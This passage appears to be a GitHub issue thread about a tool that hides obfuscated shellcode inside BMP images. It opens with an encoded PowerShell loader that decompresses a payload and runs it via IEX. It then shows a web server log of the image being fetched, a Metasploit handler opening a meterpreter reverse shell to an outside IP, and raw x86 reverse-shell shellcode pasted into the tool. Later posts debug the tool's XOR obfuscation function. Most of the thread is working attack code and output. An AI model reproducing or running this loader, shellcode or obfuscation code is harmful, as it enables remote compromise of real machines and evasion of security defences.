DAAMABzAGwAcQBjAEsAdQBXAFMAUQBZADYAVgBHAHIAagBFAEIAOABvAGgAZABFAGsAegBWAGEAeQBjAGEAdQBaAGEARgBFADMAcgBPAGQAeABlAHoAagBVAEwAcQBOAEwAVgBjAGgATgBuAEIAZABCAHkANAA1AFoASQBsAFoAWgA1AGcASQB3AGoAQwBPAGQAKwBCAGcARwBqADMARwBEAGkAawBpAE0AVwB3AHYANwBjAFoANwBNAHEAIQBHAHMAdABJAGkAMwBLAE8AVQB0AG4AdQBOAEkAZABNAG8ASQBqAEIAZwBsAGYAbQB6AHkAUwBHAEcAdQBaAE0ANAA3AG4AZwArADQAbQBHAFkAYwBFAHIAUQByADEATwBPAEIAMABoAGwAcABSAFYAbABtAFIAZQBuAFEARwBvAGYAVgBxAHMARgBVAGgATABhAHIARwA0AEYATQBCAHMAeABRAHEAawB1ADUAegBvAFYAMAB5AFoARgBLAGoARwBoAG0AcwBYADgAbQA5AFAAdwB5AHUAawBxAFkAeQB4AHAAYQBFAGsAagBtADcASwB0AFAAeAAvAGwAeQBiAHcAcQBsAEYARwBnAFAAMgA3ADIALwBaADQATwBRAHcAUABvAHcAZgBmAFMAUABRAHEAKwBuAFoAQgA5AFIARgBtAEwAWgBRAGwAbABPAE4AdQBTAEgAdQBVAHkANQBvADIASwBhAGEAMgB1ADkAaQByAGIATwA5AHIAYQAzAHQAaABtAGQAKwAyADMALwB0ADcAbgAxAG8AZgBHAGgAcwBpAFYAeABuAHUAZgBhAG0AUwBmAGEAdQBLAEoAegBhAEwARgBQAHQAMwByAFcATQB1ADQAUABUAC8AdQBuAGgAaABhAG0AYwAvADkAQwB6AEgAcABVAHEAcABoAHgAcABRADQAbQBxAGMAdQBaACEAeQBJAE4AUwBaAFEAYQBDAEcAUQAvAGIAWABuAHQAZAAzAFkAQgBNAGcAYQBPAFcAbwA5AHAAWABvAEQAYwA1AEYANABHAFIAdwBuAFgANgBoAEsAcQA4ADAATQBvAEoANQB0AE0ARgBOAG4AZAAzADEAcgBZAGMAOAB0AFAAUQBlAGQAYgBLAGEAbQBoAHYANwB3AHMAZQB3AGgAVABTAHIAOQBoADYASgA1AEQATwBkAE8AdwAyAEgAbgBZAGIARABaAFMAMAB4AHMAUAA3AEIAawBMAHoAZABoAFIAYQBJAHAAdgBiAHEAKwB1ADYAUgBoADkALwBoAFgAZAB0ACEATAB3AEkAWQBFAEYASABlAHoAUwBNAGcAcwA2AGQAZgA4AGwAUAB0AEsARAAvAEwAeAB0AGwAUwBzAGIANABGAC8ANABtAEcAOAA5AGoALwB6AEwANwBKAG8AWQBhADcAZwBwAG0ASwB4AFkAdgBCADMANgBMAHIARAA4AEcANgBaAEkAeQBqAFoANAArAGEAaABpAEgAUgBUADIAKwBDAGEAcwB5AFMAWgBkAHUAOABaAGQAVQBZAC8ANQBGADUAVwBkAGUAVwBLAGUANQByAHYAZgB4AG0AdAAvAGMAcwBEADYAWgB4AE8AaABHAFoAIQBrAHAAeABSADcAeABlAFEAVwAzADUASQBPAHoAZgBIADgAcgBUAGEAVwB1AFgANABzAHAAdgBzAGsAeQBjADgAUABhAHQAYQBUAGYAagB0AGgARABKAHoAbABvAHQAVABzAFgAdwB5ADgAbgArAGYARwA5AG0AagA5AHcAaAAzAFEANwBWACsAUwAxAFcAZgBLAEQAMQBCAEgASwBwAHQAcgBkAHcAVQBlAGMAbgBPAFYARwA1ADgAagBhAEYAKwBvAFQAdQBVAGQAIQBpAGoAMgBmAHkAQgBrAEUAZwBDACsAegArAG0AYwB4AEwAUwBRAE4AOABNADUAYQBqAHEALwBZAGMAOAAwAHEAYQBQAHcAUAAzAGEAaQBJADkAUgB3AEwAIQAhACEAPQAiAC4AUgBlAHAAbABhAGMAZQAoACIAIQAiACwAIAAiAEEAIgApACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA==
Then on the tool notice that the payload is fetched:
(web)>>> run
[+] Starting web server on port 8080
10.0.0.153 - - [14/Sep/2017 16:44:35] "GET /output.bmp HTTP/1.1" 200 -
[+] Stopping web server
On the metasploit console:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lport 8080
lport => 8080
smsf exploit(handler) > set lhost 24.37.41.158
lhost => 24.37.41.158
msf exploit(handler) > exploit
[*] Started reverse handler on 24.37.41.158:8080
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 24.37.41.154
[*] Meterpreter session 1 opened (24.37.41.158:8080 -> 24.37.41.154:29608) at 2017-09-14 17:00:05 -0400
meterpreter >
I'm getting an issue where it wont let me paste the full amount of shellcode. any idea on that one?
(generate)>>> set shellcode \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x
it wont let me enter anymore text
I may be a limitation of your terminal. I used the same shellcode that you pasted and added more to it.
=================================================================================
| |
| Module to generate malicious Bitmap image with embedded obfuscation shellcode |
| |
=================================================================================
Allowed options:
[*] (show) Show module variables
[*] (set) Set value (set key value)
[*] (run) Run the module
[*] (exit) Go back to the main menu
Module Variables description:
debug Show debug output. More verbose
source Image source file path
shellcode Shellcode payload using \x41\x41 format
output Output file path
Current variable value:
debug = false
source = sample/default.bmp
shellcode =
output = output/output-1505429835.bmp
(generate)>>> set shellcode set shellcode \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\xde\xad\xde\xad\xde\xad\xde\xad
[+] shellcode value is set.
(generate)>>> show
debug = false
source = sample/default.bmp
shellcode = set shellcode \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\xde\xad\xde\xad\xde\xad\xde\xad
output = output/output-1505429835.bmp
(generate)>>>
The show command show the content of the "variable" which contain the whole string without issue. I tried on a cygwin terminal on Windows and Ubuntu terminal and both didn't had the issue. The input is captured using raw_input() function there is no limitation implemented on my side.
yup seems to be an osx-ism. works fine in ubuntu. if i track it down i'll do an additional comment.
ty!
Glad you figured out.
Finally managed to get it to run. The problem seems to be in the random int generation as the hex value length was uneven. I worked round this by cutting the hex. This is my modified gen_shellcode function.
def gen_shellcode(self, shellcode):
key = self.gen_key()
self.ui.print_msg("Generating obfuscation key 0x%s" % key.encode("hex"))
shellcode = self.pad_shellcode(shellcode)
self.ui.print_msg(len(shellcode))
magic = self.gen_magic()
self.ui.print_msg("Generating magic bytes %s" % hex(magic))
self.ui.print_msg((hex(magic)[2:10]))
shellcode = hex(magic)[2:10].decode("hex") + shellcode
self.ui.print_msg(len(shellcode))
shellcode = self.xor_payload(shellcode, key)
self.ui.print_msg(len(shellcode))
size = len(shellcode)
shellcode = self.set_decoder(hex(magic)[2:10].decode("hex"), (size - 4)) + shellcode
self.ui.print_msg(len(shellcode))
for i in range(1, 5):
shellcode = shellcode.replace("[RAND" + str(i) + "]", self.gen_pop(hex(self.gen_magic())[2:10].decode("hex")))
self.ui.print_msg("Final shellcode length is %s (%d) bytes" % (hex(len(shellcode)), len(shellcode)))
if self.is_debug():
print
return shellcode
I'm sure this will solve the original error message of this thread
Interesting I'll try to reproduce the bug on my side. Kind of odd that hex function return a different output on Windows.
I think there's one still missing on line 73
fixed thanks.